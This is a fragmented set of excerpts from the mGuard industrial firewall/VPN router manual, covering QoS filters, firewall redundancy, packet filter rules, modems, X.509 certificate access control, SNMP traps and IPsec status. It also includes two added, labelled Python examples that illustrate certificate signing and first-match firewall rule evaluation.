Current TOS/DSCP: Each data packet contains a TOS or DSCP field. TOS stands for Type of Service, DSCP stands for Differentiated Services Code Point. The traffic type to which the data packet belongs is specified here. For example, an IP phone will write a different entry in this field for outgoing data packets compared to an FTP program. When a value is selected here, only data packets with this value in the TOS or DSCP field may pass through. When set to All, no filtering according to the TOS/DSCP value is applied.

Guaranteed: The number entered specifies how many data packets per second or kbps can pass through at all times, according to the option set under Measurement Unit (see above). This applies to the data stream that conforms to the rule set
...mGuard devices. It is used for encryption and is never transmitted in plain text. The password is important for security since the mGuard is vulnerable at this point. We recommend a password with at least 20 characters and numerous special characters (printable UTF-8 characters). It must be changed on a regular basis.

When changing the password, proceed as follows:
• Check the status of the set password before you enter a new one. There is only a valid password available, and you are only permitted to enter a new password, if you can see a green check mark to the right of the entry field.
• Set the new password on both mGuard devices. It does not matter which order you do this in, but the same password must be used in both cases. If you inadvertently enter an incorrect password, follow the instructions under How to proceed in the event of an incorrect password on page 308.

As soon as a redundant pair has been assigned a new password, it automatically negotiates when it can switch to the new password without interruption. The status is displayed using symbols. We recommend observing this status for security reasons.
• A red cross indicates that the mGuard has a new password that it wants to use. However, the old password is still in use.
• A yellow check mark indicates that the new password is already in use, but that the old password can still be accepted in case the other mGuard still uses it.
• If no symbol is show
...purchased and installed. Only identical mGuard devices can be used together in a redundant pair. In Router network mode, firewall redundancy is only supported with the static Router mode. The Stealth network mode is currently not supported. For further restrictions, see Requirements for firewall redundancy on page 334 and Limits of firewall redundancy on page 344.

16.1.1 Components in firewall redundancy

Firewall redundancy is comprised of several components:
• Connectivity check: Checks whether the necessary network connections have been established.
• Availability check: Checks whether an active mGuard is available and whether this should remain active.
• State synchronization of the firewall: The mGuard on standby receives a copy of the current firewall database state.
• Virtual network interface: Provides virtual IP addresses and MAC addresses that can be used by other devices as routes and default gateways.
• State monitoring: Coordinates all components.
• Status indicator: Shows the user the state of the mGuard.

Connectivity check: On each mGuard in a redundant pair, checks are constantly made as to whether a connection is established through which the network packets can be forwarded. Each mGuard checks its own internal and external network interfaces independently of each other. Both interfaces are tested for a continuous connection. This connecti
...the primary external interface is specified as 10.0.0.0/8, while the external route of the secondary external interface is specified as 10.1.7.0/24. Data packets to network 10.1.7.0/24 are then routed via the secondary external interface, although the routing entry for the primary external interface also matches them. Explanation: the routing entry for the secondary external interface refers to a smaller network (10.1.7.0/24 < 10.0.0.0/8).

This rule does not apply in Stealth network mode with regard to the stealth management IP address (see note under Stealth Management IP Address on page 114).

If the routing entries for the primary and secondary external interfaces are identical, then the secondary external interface wins, i.e. the data packets with a matching destination address are routed via the secondary external interface.

The routing settings for the secondary external interface only take effect when the secondary external interface is activated. Particular attention must be paid to this if the routing entries for the primary and secondary external interfaces overlap or are identical, whereby the priority of the secondary external interface has a filter effect with the following result: data packets whose destination matches both the primary and secondary external interfaces are always routed via the secondary external interface, but only if this is activated.

In temporary mode activated signi
...the service contacts.

Service contacts (service I/Os) can be connected to some mGuards: mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard industrial rs. A push button or an on/off switch can be connected to inputs CMD 1-3. The push button or on/off switch is used to establish and release predefined VPN connections or the defined firewall rule records.

For the VPN connections, it can be set whether the VPN connection is to be switched via one of the service contacts (IPsec VPN >> Connections >> Edit >> General). If a switch is connected, the switch behavior can also be inverted.

For the firewall rule records, it can be set whether a rule is to be switched via one of the service contacts or if a VPN connection is to be switched (Network Security >> Packet Filter >> Rule Records).

In this way, one or more freely selectable VPN connections or firewall rule records can be switched. A mixture of VPN connections and firewall rule records is also possible. The web interface displays which VPN connections and which firewall rule records are connected to one input (Management >> Service I/O >> Service I/O).

In addition, the behavior of outputs ACK 1-3 can be set on the web interface (Management >> Service I/O >> Service I/O). Outputs ACK 1/2 can be used to monitor specific VPN connections or firewall rule records and to display them using LEDs. Alarm output ACK 3 monitors the fun
...the user firewall rules apply can now be selected for the user firewall under Network Security >> User Firewall >> User Firewall Templates.

3.1.2 Dynamic activation of the firewall rules (conditional firewall)

The firewall rules can now be activated via an external event:
• A button on the web interface under Network Security >> Packet Filter >> Rule Records.
• An API command line that is activated using the name or the row ID:
  /Packages/mguard-api_0/mbin/action fwrules in|active <ROWID>
  /Packages/mguard-api_0/mbin/action_name fwrules in|active <NAME>
• An externally connected button/switch, for mGuards that allow connection (see Dynamic activation of the firewall rules (conditional firewall) on page 27).
• Establishing or releasing a VPN connection. It can be set whether an established VPN connection activates or deactivates the firewall rule.
• Incoming text message (for mGuard rs4000/rs2000 3G only). See Token for text message trigger under Network Security >> Packet Filter >> Rule Records.
• CGI interface: The nph-action.cgi CGI script can be used to control firewall rules.

If the status of the firewall rule record changes, an e-mail can automatically be sent. With regard to the mGuard rs4000/rs2000 3G, a text message can also be sent in this case.

3.1.3 Function extension of t
...header: the specified Ethernet protocol, the specified IP protocol, the specified TOS/DSCP value and/or the VLAN ID (if VLANs have been set up). As the list of filter rules must be applied to each individual data packet, it should be kept as short as possible. Otherwise the time spent on filtering could be longer than the time actually saved by setting the filter.

Please note that not all specified filter criteria should be combined. For example, it does not make sense to specify an additional IP protocol in the same rule that contains the ARP Ethernet protocol. Nor does it make sense to specify a transmitter or sender IP address if the IPX Ethernet protocol is specified in hexadecimal format.

12.1.1 Internal/External

[Screenshot residue: QoS >> Ingress Filters >> Internal/External. Enabling: Enable ingress QoS: No. Measurement Unit: Packets. Filters: one rule: No, All, 0.0.0.0/0, 0.0.0.0/0, 100, unlimited. Internal settings for the ingress filter at the LAN interface.]

[Screenshot residue: QoS >> Ingress Filters >> Internal/External. Enabling: Enable ingress QoS: No. Measurement Unit: Packets. Filters: rule 1: ARP, All, No, 0.0.0.0/0, 0.0.0.0/0, 100, unlimited; rule 2: No, ipv4, All, 0.0.0.0/0, 0.0.0.0/0, All, 1, unlimited. External settings for the ingress filter at the WAN interface.]

QoS >> Ingress Filters >> Internal/External

Enabl
...established via the telephone network. Because the ping tests generate network traffic, the number of tests and their frequency should be kept within reasonable limits. You should also avoid activating the secondary external interface too early. The timeout time for the individual ping requests is 4 seconds. This means that after a ping test is started, the next ping test starts after 4 seconds if the previous one was unsuccessful. To take these considerations into account, make the following settings:

Probe Interval (seconds): The ping tests defined above under Probes for activation are performed one after the other. When the ping tests defined are performed once in sequence, this is known as a test run. Test runs are continuously repeated at intervals. The interval entered in this field specifies how long the mGuard waits after starting a test run before it starts the next test run. The test runs are not necessarily completed: as soon as one ping test in a test run is successful, the subsequent ping tests in this test run are omitted. If a test run takes longer than the interval specified, then the subsequent test run is started directly after it.

Network >> Interfaces >> General (continued)
Secondary External Interface (continued)

Number of times all probes need to fail during subsequent runs before the secondary external interface is activated: DN
...this option is set to Built-in Modem, the PPP dial-in option is available. In this case the modem connection is not established via the serial socket on the front. Instead it is established via the terminal strip on the bottom, where the built-in modem or ISDN terminal adapter is connected to the telephone network. The connection settings for the built-in modem should be made on the Modem/Console tab page. If the Built-in Modem option is used, the serial interface can also be used. For the options for using the serial interface, see Modem/Console on page 139.

• IP address of the mGuard via which it can be accessed for a PPP connection.
• IP address of the partner of the PPP connection.
• Login name that must be specified by the PPP partner in order to access the mGuard via a PPP connection.
• The password that must be specified by the PPP partner in order to access the mGuard via a PPP connection.

Network >> Interfaces >> Dial-in

Incoming Rules (PPP), Outgoing Rules (PPP): Firewall rules for PPP connections to the LAN interface. If multiple firewall rules are defined, these are queried starting from the top of the list of entries until an appropriate rule is found. This rule is then applied. If the list of rules contains further subsequent rules that could also apply, these rules are ignored. The following options are available: Protocol, From, To IP, F
...method Aggressive Mode can be selected under IPsec VPN >> Connections >> Edit >> Authentication.

On the web interface, dynamic modifications are highlighted red: On the web interface, status messages are displayed and permanently updated. To recognize these entries more easily, they are displayed in red.

Detailed logging of modems: Only for mGuards that have an internal or external modem or that are capable of mobile communication (under Logging >> Settings).

3.2 Overview of modifications in version 8.0

The following functions have been added to firmware Version 8.0:

Configuration extensions
• Improved CIFS Integrity Monitoring (see New in CIFS Integrity Monitoring on page 31).
• Integrated COM server for mGuard platforms with serial interface (see COM server for mGuard platforms with serial interface on page 143).
• Configurable multicast support for devices with internal switch, in order to send data to a group of receivers without the transmitter having to send it multiple times (see Multicast on page 150).
• VPN extensions (see VPN extensions on page 31).
• Dynamic web interface for configuration: Incorrect entries are highlighted in color and help is also offered in the form of system messages (see CIDR (Classless Inter-Domain Routing) on page 24).
• Support for mGuard platforms mGuard rs4000 3G and mGuard rs2000 3G.
• Suppor
...certificates should also have a validity period. If the CRL check is activated under Authentication >> Certificates >> Certificate settings, one URL where the corresponding CRL is available must be maintained for each CA certificate. The URL and CRL must be published before the mGuard uses the CA certificates in order to confirm the validity of the certificates shown by the VPN partners.

Using X.509 certificates with limited validity periods and CRL checks: The use of X.509 certificates is described under Certificate settings on page 195 (Authentication >> Certificates >> Certificate settings menu). If X.509 certificates are used and "Check the validity period of certificates and CRLs" is set, the system time has to be correct. We recommend synchronizing the system time using a trusted NTP server. Each mGuard in a redundant pair can use the other as an additional NTP server, but not as the only NTP server.

17 Glossary

Asymmetrical encryption: In asymmetrical encryption, data is encrypted with one key and decrypted with a second key. Both keys are suitable for encryption and decryption. One of the keys is kept secret by its owner (private key), while the other is made available to the public (public key), i.e. to potential communication par

[Further glossary entries on this page: DES / 3DES / AES; CA certificate]
[Table residue, continued]
Messages:
• ...ice load from Blade d failed
• Configuration file from Blade d not found
• New configuration file for Blade d saved
• Configuration file deletion of Blade d failed
• Configuration file of Blade d deleted
Actions:
• ...replaced in this slot
• Delete configuration backup of Blade __: Deletes the configuration stored on the controller for the device in this slot.
• Upload configuration from client: Uploads and saves the configuration profile for this slot on the controller.
• Download configuration to client: Downloads the configuration profile stored on the controller for this slot onto the configuration PC.

6 Network menu

6.1 Network >> Interfaces

The mGuard has the following interfaces with external access: Ethernet (internal LAN, external WAN), serial interface, built-in modem, serial console via USB.

[Table residue: platforms mGuard rs4000 3G, mGuard rs2000 3G, mGuard rs4000/rs2000, mGuard centerport, mGuard industrial rs, mGuard pci, mGuard blade, mGuard delta, EAGLE mGuard, mGuard pci SD, mGuard pcie SD; cell values Yes / Optional. (1) See Serial console via USB on page 141.]

The LAN port is connected to a single computer or the local network (internal). The WAN port is used to connect to the external network. For devices with a serial interfa
...device with the IP address specified under Destination. Multiple ping tests can be configured for different destinations.

Success/failure: A ping test is successful if the mGuard receives a positive response to the sent ping request packet within 4 seconds. If the response is positive, the partner can be reached.

Network >> Interfaces >> General (continued)
Secondary External Interface (continued)

Ping types:
• IKE Ping: Determines whether a VPN gateway can be reached at the IP address specified.
• ICMP Ping: Determines whether a device can be reached at the IP address specified. This is the most common ping test. However, the response to this ping test is disabled on some devices. This means that they do not respond even though they can be reached.
• DNS Ping: Determines whether an operational DNS server can be reached at the IP address specified. A generic request is sent to the DNS server with the specified IP address, and every DNS server that can be reached responds to this request.

Please note the following when programming ping tests: It is useful to program multiple ping tests. This is because it is possible that an individual tested service is currently undergoing maintenance. This type of scenario should not result in the secondary external interface being activated and an expensive dial-up line connection being establis
...restricted to X.509 client certificate when you are sure that this setting works. Otherwise your access could be blocked. Always take this precautionary measure when modifying settings under User authentication.

Management >> Web Settings >> Access

X.509 Subject: Enables a filter to be set in relation to the contents of the Subject field in the certificate shown by the browser (HTTPS client). It is then possible to limit or enable access for the browser (HTTPS client) which the mGuard would accept based on certificate checks:
• Limited access to certain subjects (i.e. individuals) and/or to subjects that have certain attributes, or
• Access enabled for all subjects (see glossary under Subject, certificate on page 360).

The X.509 Subject field must not be left empty.

Access enabled for all subjects (i.e. individuals): An asterisk in the X.509 Subject field can be used to specify that all subject entries in the certificate shown by the browser (HTTPS client) are permitted. It is then no longer necessary to identify or define the subject in the certificate.

Management >> Web Settings >> Access

Limited access to certain subjects (i.e. individuals) and/or to subjects that have certain attributes: In the certificate, the certificate owner is specified in the
...providing this signature, the CA confirms that the authorized certificate owner possesses a private key that corresponds to the public key in the certificate. The name of the certificate issuer appears under Issuer on the certificate, while the name of the certificate owner appears under Subject.

A self-signed certificate is one that is signed by the certificate owner and not by a CA. In self-signed certificates, the name of the certificate owner appears under both Issuer and Subject. Self-signed certificates are used if communication partners want to or must use the X.509 authentication method without having or using an official certificate. This type of authentication should only be used between communication partners that know and trust each other. Otherwise, from a security point of view, such certificates are as worthless as, for example, a home-made passport without the official stamp.

Certificates are shown to all communication partners (users or machines) during the connection process, providing the X.509 authentication method is used. In terms of the mGuard, this could apply to the following applications:
• Authentication of communication partners when establishing VPN connections (see IPsec VPN >> Connections on page 254, Authentication on page 269).
• Management of the mGuard via SSH (shell access) (see Management >> System Settings >> Host on page 33, Shell Access on page 40
...individual firewall rule, you can specify whether the use of the rule
• should be logged (set Log to Yes)
• should not be logged (set Log to No, default setting)

Log entries for unknown connection attempts: When set to Yes, all connection attempts that are not covered by the rules defined above are logged. Default setting: No.

External 2 and Any External are only for devices with a serial interface (see Network >> Interfaces on page 105).

8.1.2 Outgoing rules

[Screenshot residue: Network Security >> Packet Filter (tabs: Incoming Rules, Outgoing Rules, DMZ, Rule Records, MAC Filtering, Advanced). Outgoing: General firewall setting: Use the firewall ruleset below. Log ID: fw-outgoing-3391ddd7-f26e-1220-250e-000cbe00052ee. Rules (Protocol, From IP, From Port, To IP, To Port, Action, Comment, Log): 1: All, 0.0.0.0/0, any, 0.0.0.0/0, any, Accept, "default rule", No; 2: TCP, 0.0.0.0/0, any, 0.0.0.0/0, any, Accept, Yes. Protocol choices: TCP, UDP, ICMP, GRE, All. These rules define which traffic from the inside is allowed to pass to the outside. Please note: ports are only meaningful for TCP and UDP. Log entries for unknown connection attempts: No.]

Network Security >> Packet Filter >> Outgoing Rules

Outgoing: Lists the firewall rules that have been set up. They apply for outgoing data links that have been initiated internally in order to communicate with a remote partner. Default setting: a rule is defined by default that allows all ou
...ier

Network >> Interfaces >> Modem/Console (for the mGuard industrial rs with built-in modem)

External Modem: As for the mGuard rs4000 3G, mGuard industrial rs (without built-in modem), mGuard delta, mGuard centerport, mGuard blade, mGuard delta, EAGLE mGuard. Configuration as above for External Modem (see External Modem on page 141).

Built-in Modem (analog)

Country: The country where the mGuard with built-in modem is operated must be specified here. This ensures that the built-in modem operates according to the applicable remote access guidelines in the respective country and that it recognizes and uses dial tones correctly, for example.

Extension line regarding dial tone: Yes / No. When set to No, the mGuard waits for the dial tone when the telephone network is accessed and the mGuard is calling the partner. When set to Yes, the mGuard does not wait for a dial tone. Instead it begins dialing the partner immediately. This procedure may be necessary if the built-in modem of the mGuard is connected to a private branch exchange that does not emit a dial tone when it is picked up. When a specific number must be dialed to access an external line (e.g. 0), this number should be added to the start of the desired partner phone number that is to be dialed.

Speaker volume (built-in speaker), Speaker control (built-in speaker): These two settings specify
265. ...ies. Otherwise the ISDN protocol should be specified according to the country; if necessary, this must be requested from the relevant phone company.
Layer 2 protocol: The set of rules used by the ISDN terminal adapter of the local mGuard to communicate with its ISDN partner. This is generally the ISDN modem of the Internet service provider used to establish the connection to the Internet. It must be requested from the Internet service provider; PPP/ML-PPP is often used.

6.2 Network >> Ethernet
Only available with the mGuard rs4000 3G.
6.2.1 MAU settings
[Screenshot of Network >> Ethernet (tab pages MAU settings, Multicast, Ethernet). Port Mirroring: Disabled; Port Mirroring Receiver. MAU Configuration table for the ports WAN, LAN1 to LAN4 and DMZ: each 10/100 BASE-T (RJ45), enabled, configured as 100 Mbit/s FDX, with the current link state (100 Mbit/s FDX, Down or Unused) and further per-port settings. Address Resolution Table (update interval 10 s) showing the MAC address learned on LAN1. Port Statistics (update interval 5 s) with frame counters per port.]
Network >> Ethernet >> MAU settings
Port Mirroring: Port Mirrorin
266. ...ies.
6.1.4 Modem/Console
Margin notes: Only mGuard rs4000 3G; mGuard rs2000 3G (only console); mGuard rs4000/rs2000; mGuard centerport; mGuard industrial rs; mGuard smart; mGuard delta; not mGuard smart; mGuard pci SD; mGuard blade; mGuard delta EAGLE. The items Primary external interface, Secondary external interface and "For dialing in to the LAN or for configuration purposes" are not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000.
Some mGuard models have a serial interface that can be accessed externally, while the mGuard industrial rs is also available with a built-in modem as an option (see Network >> Interfaces on page 105).
[Screenshot of the Modem/Console tab page (further tab pages: General, Dial-out, Dial-in). Serial Console: Baudrate 57600, Hardware handshake (RTS/CTS) Off. External Modem: Hardware handshake (RTS/CTS) Off, Baudrate 57600, "Handle modem transparently for dial-in only".]
Please note: On some platforms the serial port is not accessible. The settings above become effective only for administrative shell login via a console connected to the serial port. Such logins are impossible if dial-in or dial-out is configured via an external modem.
Modem in
267. ...if the other mGuard fails.
becomes_active: the mGuard is becoming active because the other mGuard has failed.
active: the mGuard is active.
becomes_standby: the mGuard is switching from the active state to standby mode. The state is changed to outdated, since the status database has to be updated first.
Availability check: Relates to the status of the availability check for the internal or external interface. The availability check has three possible results: presence notifications (CARP) are not received from any other mGuard device; another mGuard is available which is to become or remain active; another mGuard is available which is active but is to go on_standby.
Connectivity check: Indicates whether the check was successful. Each interface is checked separately.
State synchronization: When synchronizing the state, various databases are checked to see whether everything is up to date. With one redundant pair, only one database is active while the other is on standby. Any change made to this state is also displayed. The Connection Tracking Table relates to the firewall state database. IPsec VPN Connections: with activated VPN redundancy, all virtual interfaces are checked together to see whether the forwarding of packets is allowed.
Redundancy >> FW Redundancy Status >> Redundancy Status
State History: Firmware status, System time, Timeout of the previous state, Availability che
268. ...if you are an experienced user, as doing so could result in all access to the mGuard being blocked. When setting up RADIUS authentication for the first time, select Yes.
If you do intend to use the "As only method for password authentication" option when setting up RADIUS authentication, we recommend that you first create a Customized Default Profile which resets the authentication method.
If you have selected RADIUS authentication as the only method for checking the password, it may no longer be possible to access the mGuard. For example, this may be the case if you set up the wrong RADIUS server or convert the mGuard. The predefined users root, admin, netadmin, audit and user are then no longer accepted.
1) External 2 and Dial-in are only available for devices with a serial interface (see Network >> Interfaces on page 105).

Management >> Web Settings >> Access
User authentication
This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000.
[Screenshot: User authentication method "Login with X.509 client certificate or password"; below it a table of certificates with the access level granted, e.g. the CA certificate "VPN RootCA01" and the client certificate "Battaglia Mauro", both assigned to root.]
User authentication method: Defines how the local mGuard authenticates the remote user.
Login with password: Specifies that the remote user must use a password to log into the mGuard. The password is specified under Authentication >> Administ
269. ...ificate. An X.509 v3 certificate thus consists of a public key, information about the key owner (the Distinguished Name, DN, authorized use, etc.) and the signature of the CA.
Subject certificate: The signature is created as follows. The CA computes a hash value over the bit string of the public key, the owner information and the other certificate data. This hash value has a fixed length (160 bits with SHA-1, for example; longer with SHA-256) and is known as the HASH value. The CA then signs this hash with its own private key (in RSA terms: applies the private key to the hash, which the older literature describes as "encrypting" it) and adds the result to the certificate. Only the holder of the CA's private key can produce this value, i.e. the signed HASH string is the CA's digital signature and proves the authenticity of the certificate. If the certificate data is tampered with, the HASH value will no longer match and the certificate is rendered worthless. The HASH value is also known as the fingerprint. Since it is signed with the CA's private key, anyone who has the corresponding public key can recover the signed hash, compare it with a freshly computed hash of the certificate data and thus verify the authenticity of the fingerprint (signature). The involvement of a certification authority means that it is not necessary for key owners to know each other. They only need to know the certification authority involved in the process. The additional key information also simplifies administration of the key. X.509 certificates can, for example, be used for e-mail encryption by means of S/MIME or for IPsec.
Protocol tra
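The signing and verification steps described above, carried out end to end as an added example (this is not code from the mGuard manual or from the product). It uses a toy RSA CA key built from two Mersenne primes and a sorted JSON string in place of DER encoding, both of which are this example's own assumptions; real CAs use 2048-bit or larger keys and SHA-256 rather than the 160-bit SHA-1 mentioned in the text. The example shows what the text states: the CA applies its private key to the hash, anyone with the public key recovers that hash and compares it with a fresh hash of the certificate body, and a changed subject makes the comparison fail.

```python
"""Added example, not code from the mGuard manual: the signing and
verification steps for an X.509-style certificate, carried out with a toy
RSA CA key so that it runs offline.  Assumptions: the CA modulus is built
from two Mersenne primes (2^127-1 and 2^89-1) and the certificate body is
a sorted JSON string instead of DER; real CAs use 2048-bit or larger keys
and SHA-256 instead of the 160-bit SHA-1 used here."""
import hashlib
import json
from typing import Dict, Tuple

# Toy CA key pair (assumption: far too small for real use).
P = (1 << 127) - 1
Q = (1 << 89) - 1
N = P * Q                          # ~216-bit modulus, large enough to hold a 160-bit hash
E = 65537                          # CA public exponent
D = pow(E, -1, (P - 1) * (Q - 1))  # CA private exponent (needs Python 3.8+)


def tbs_bytes(cert: Dict[str, str]) -> bytes:
    """Canonical encoding of everything except the signature (the 'to be signed' part)."""
    body = {k: v for k, v in cert.items() if k != "signature"}
    return json.dumps(body, sort_keys=True).encode()


def fingerprint(cert: Dict[str, str]) -> int:
    """The 160-bit HASH value over public key, owner information and other data."""
    return int.from_bytes(hashlib.sha1(tbs_bytes(cert)).digest(), "big")


def ca_sign(cert: Dict[str, str]) -> Dict[str, str]:
    """CA step: hash the body, then apply the CA private key to the hash."""
    signed = dict(cert)
    signed["signature"] = format(pow(fingerprint(cert), D, N), "x")
    return signed


def verify(cert: Dict[str, str], ca_public: Tuple[int, int] = (N, E)) -> bool:
    """Anyone holding the CA public key recovers the signed hash and compares it
    with a hash computed freshly over the certificate body."""
    n, e = ca_public
    recovered = pow(int(cert["signature"], 16), e, n)
    return recovered == fingerprint(cert)


def demo() -> Tuple[bool, bool]:
    """Returns (verification of the genuine certificate, verification after tampering)."""
    subject = {
        "subject": "CN=John Smith, O=Smith and Co, C=US",   # the Distinguished Name
        "public_key": "key-bytes-of-john-smith",            # constructed placeholder
        "key_usage": "digitalSignature",                    # authorized use
        "issuer": "CN=Example CA",
    }
    cert = ca_sign(subject)
    tampered = dict(cert)
    tampered["subject"] = "CN=Mallory, O=Smith and Co, C=US"   # changes the hash, not the signature
    return verify(cert), verify(tampered)
```

The verifier never needs the CA's private exponent D, which is the point of the arrangement: the mGuard only has to hold the CA's public key to accept certificates from partners it has never seen before.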
270. ...ilter is case sensitive. Several filters can be set and their sequence is irrelevant.
Authorized for access as: All users, root, admin, netadmin, audit. Additional filter which specifies that the SSH client has to be authorized for a specific administration level in order to gain access. When establishing a connection, the SSH client shows its certificate and also specifies the system user for which the SSH session is to be opened (root, admin, netadmin, audit). Access is only granted if the entries match those defined here. Access for all listed system users is possible when All users is set. The netadmin and audit setting options relate to access rights with the mGuard device manager.
Management >> System Settings >> Shell Access
Client certificate: Configuration is required in the following cases: SSH clients each show a self-signed certificate; SSH clients each show a certificate signed by a CA and filtering should take place, i.e. access is only granted to a user whose certificate copy is installed on the mGuard as the remote certificate and is provided to the mGuard in this table as the Client certificate. This filter is not subordinate to the Subject filter. It resides on the same level and is combined with the Subject filter by a logical OR. The entry in this field defines whi
271. ...in, you must implement this explicitly by means of corresponding firewall rules, for example by specifying Drop as an action.
Action: Accept means that the data packets may pass through. Reject means that the data packets are discarded and the sender is informed of their rejection (an error message is returned to the sender). In Stealth mode, Reject has the same effect as Drop. Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts.
Comment: Freely selectable comment for this rule.
Log: For each individual firewall rule you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting).
1) External 2 and Dial-in are only available for devices with a serial interface (see Network >> Interfaces on page 105).

11.2 Connections
SEC Stick >> Connections >> SEC Stick connections
[Screenshot of the SEC Stick connections table with an example entry "myCompany", Enabled: No.]
SEC Stick connections: List of defined SEC Stick connections. Click on the down arrow at the top left of the screen if you want to add a new connection. An existing connection can be edited by clicking on Edit. Not all of the SEC Stick functions can be configured via the web interface of the mGuard.
Enabled: To use a defined SE
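How a rule table with the Action and Log fields described above (and in the Outgoing rules description) is evaluated, as an added example; this is not code from the mGuard manual or from the product. The rule and packet layouts, the log line format and the treatment of a packet matched by no rule (discarded) are this example's own assumptions; the modelled behaviour follows the field descriptions: rules are tried top-down and the first match decides, Accept passes, Reject discards and informs the sender, Drop discards silently, Reject becomes Drop in Stealth mode, a rule with Log = Yes produces a log entry, and unmatched packets are logged only when "Log entries for unknown connection attempts" is Yes.

```python
"""Added example, not code from the mGuard manual: a minimal model of how
a rule table with the Action and Log fields described in the manual is
evaluated.  Rule/packet layouts, the log format and the implicit Drop for
unmatched packets are this example's own assumptions."""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple


@dataclass
class Rule:
    protocol: str      # "any", "TCP", "UDP", "ICMP", "GRE"
    from_ip: str       # CIDR, e.g. "0.0.0.0/0"
    from_port: str     # "any" or a port number (only meaningful for TCP/UDP)
    to_ip: str
    to_port: str
    action: str        # "Accept", "Reject" or "Drop"
    log: bool = False
    comment: str = ""


@dataclass
class Packet:
    protocol: str
    src: str
    dst: str
    sport: Optional[int] = None
    dport: Optional[int] = None


@dataclass
class Filter:
    rules: List[Rule]
    log_unknown: bool = False   # "Log entries for unknown connection attempts"
    stealth_mode: bool = False
    log: List[str] = field(default_factory=list)

    @staticmethod
    def _port_ok(want: str, have: Optional[int]) -> bool:
        return want == "any" or (have is not None and int(want) == have)

    def _matches(self, r: Rule, p: Packet) -> bool:
        if r.protocol != "any" and r.protocol != p.protocol:
            return False
        if ip_address(p.src) not in ip_network(r.from_ip):
            return False
        if ip_address(p.dst) not in ip_network(r.to_ip):
            return False
        if p.protocol in ("TCP", "UDP"):
            return self._port_ok(r.from_port, p.sport) and self._port_ok(r.to_port, p.dport)
        return True   # ports are only meaningful for TCP and UDP

    def evaluate(self, p: Packet) -> Tuple[str, Optional[Rule]]:
        """Returns the verdict and the rule that produced it (None if no rule matched)."""
        for r in self.rules:
            if not self._matches(r, p):
                continue
            # in Stealth mode Reject has the same effect as Drop
            verdict = "Drop" if (r.action == "Reject" and self.stealth_mode) else r.action
            if r.log:
                self.log.append(f"fw {verdict}: {p.protocol} {p.src}:{p.sport} -> {p.dst}:{p.dport} [{r.comment}]")
            return verdict, r
        # no rule matched: discarded (assumption), logged only if configured
        if self.log_unknown:
            self.log.append(f"fw unknown connection attempt: {p.protocol} {p.src} -> {p.dst}")
        return "Drop", None
```

A table that opens with a broad Accept rule never reaches the narrower Reject or Drop rules below it, which is why the order of rules, and the position of the "default rule", matters when reviewing a configuration.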
272. ...in the VPN.
Local IP for L2TP connections: If set as shown in the screenshot above, the mGuard will inform the partner that its address is 10.106.106.1.
Remote IP range (start/end): If set as shown in the screenshot above, the mGuard will assign the partner an IP address between 10.106.106.2 and 10.106.106.254.
Status: Displays information about the L2TP status if this connection type has been selected.
IPsec VPN >> L2TP over IPsec >> L2TP Server

10.4 IPsec VPN >> IPsec Status
[Screenshot of IPsec VPN >> IPsec Status: a table with the columns Connection Name, ISAKMP State and IPsec State, and per connection the Gateway, Traffic and ID, with Update, Restart and Edit buttons. Example entry: connection "Mannheim-Leipzig", Gateway 172.16.66.48 (any), Traffic 192.168.1.1/32 to 192.168.254.1/32, IDs given as X.509 subjects (C=DE, O=Beispiel Lieferant, CN=VPN-Endpunkt) and "Kundendienst Maschine 06".]
Displays information about the status of IPsec connections. The names of the VPN connections are listed on the left, while their current status is indicated on the right.
Buttons: To update the displayed data if necessary, click on Update. If you want to disconnect and then restart a connection, click on the corresponding Restart button. If you want to reconfigure a connection, click on the corresponding Edit button.
Connection, ISAKMP State, IPsec State:
273. ...in user, then the first filter applies. The user is assigned the access rights defined by this filter, which could differ from the access rights assigned to the user in the subsequent filters. If remote certificates are configured as filters in the X.509 Certificate table column, these filters have priority over the filter settings here.
Management >> Web Settings >> Access
Authorized for access as: All users, root, admin, netadmin, audit. Specifies which user or administrator rights are granted to the remote user. For a description of the root, admin and user authorization levels, see Authentication >> Administrative Users on page 181. The netadmin and audit authorization levels relate to access rights with the mGuard device manager.
X.509 Certificate: Configuration is required in the following cases: remote users each show a self-signed certificate; remote users each show a certificate signed by a CA and filtering should take place, i.e. access is only granted to a user whose certificate copy is installed on the mGuard as the remote certificate and is provided to the mGuard in this table as the X.509 certificate. If used, this filter has priority over the Subject filter in the table above. The entry in this field defines which remote certificate th
274. ...informed of their whereabouts.
Comment: Freely selectable comment for this rule.
Log: For each individual firewall rule you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting).
1) External 2 and Dial-in are only available for devices with a serial interface (see Network >> Interfaces on page 105).

4.5.2 Trap
[Screenshot of the Trap tab page. Basic traps: SNMP authentication (Yes), Link Up/Down (Yes), Coldstart (Yes), Admin access (SSH, HTTPS), New DHCP client. Hardware related traps: Chassis (power, signal relay) (Yes), Agent (external config storage, temperature). CIFS integrity traps: Successful integrity check of a CIFS share, Failed integrity check of a CIFS share (Yes), Found a suspicious difference on a CIFS share. Redundancy traps: Status change (Yes). Userfirewall traps: Userfirewall traps (Yes). VPN traps: IPsec connection status changes (Yes), L2TP connection status changes (Yes). Mobile Network traps: Incoming SMS or voice call, network supervision. Trap destinations table with the columns Destination IP, Destination Port, Destination Name and Destination Community; example entry 192.168.10.10, port 162, "SNMP Blomberg".]
In certain cases the mGuard can send SNMP traps. SNMP traps are only sent if the SNMP request is activated. The traps correspond to SNMPv1. Note that SNMPv1 neither authenticates nor encrypts: the community string and the trap contents travel in clear text, so trap destinations should only be reachable over a trusted management network. The trap information f
275. ...ing
Enable Ingress QoS: No (default): this feature is disabled; if filter rules are defined, they are ignored. Yes: this feature is enabled. Data packets may only pass through and be forwarded to the mGuard for further evaluation and processing if they comply with the filter rules defined below. Filters can be set for the LAN port (Internal tab page) and the WAN port (External tab page).
Measurement Unit: kbps or Packet/s. Specifies the unit of measurement for the numerical values entered under Guaranteed and Upper Limit.
Filter
Use VLAN: If a VLAN is set up, the relevant VLAN ID can be specified to allow the relevant data packets to pass through. To do this, this option must be set to Yes.
VLAN ID: Specifies that the VLAN data packets that have this VLAN ID may pass through. To do this, the Use VLAN option must be set to Yes.
